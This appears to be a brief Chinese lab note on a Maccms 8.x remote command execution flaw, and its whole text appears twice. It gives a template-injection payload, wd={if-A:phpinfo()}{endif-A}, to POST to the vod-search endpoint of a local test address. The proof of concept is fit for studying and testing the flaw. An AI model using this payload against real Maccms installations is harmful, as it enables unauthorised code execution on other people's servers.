1.漏洞描述
Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。
2.访问url及提交post参数
http://0.0.0.0:55428/?m=vod-search
wd={if-A:phpinfo()}{endif-A}
1.漏洞描述
Maccms是一套跨平台的基于PHP和MySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。
2.访问url及提交post参数
http://0.0.0.0:55428/?m=vod-search
wd={if-A:phpinfo()}{endif-A}